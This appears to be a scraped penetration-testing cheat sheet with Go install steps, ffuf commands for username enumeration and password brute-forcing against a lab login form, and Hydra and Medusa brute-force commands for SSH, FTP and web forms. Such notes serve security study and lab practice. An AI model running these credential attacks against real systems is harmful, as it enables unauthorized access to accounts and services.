Ffuf
HydraMEDUSALast updated
# Remove the golang-go package
sudo apt-get remove golang-go
# Remove the golang-go dependencies
sudo apt-get remove --auto-remove golang-go
# Uninstall the existing Go package
sudo rm -rvf /usr/local/go
# Install the new Go version
wget https://dl.google.com/go/go1.14.linux-amd64.tar.gz
# Extract the archive file
sudo tar -xvf go1.14.linux-amd64.tar.gz
sudo mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
# Reload environment variables
source ~/.profile
# Verify Go version
go versionffuf -w /usr/share/wordlists/usernames.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.247.33/customers/signup -mr "username already exists"ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/best.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.247.33/customers/login -fc 200# usually installed by default on kali/parrot
apt install hydra-l <user> # specifies the user
-P <path_passwd> # takes a path to a file which contains a list of password
-t <int> # specifies the number of threads used during the attack
-f # exit when a login/pass pair is found (-M: -f per host, -F global)
-s <PORT> # specifies service port
-V # verbose hydra -l <user_name> -P <wordlist>.txt ssh://<ip_victim>hydra -l user -P <wordlist>.txt ftp://<ip_victim>hydra -l <username> -P <wordlist> <ip_victim> http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -Vmedusa -h IP -U users.txt -P passwords.txt -M ssh IP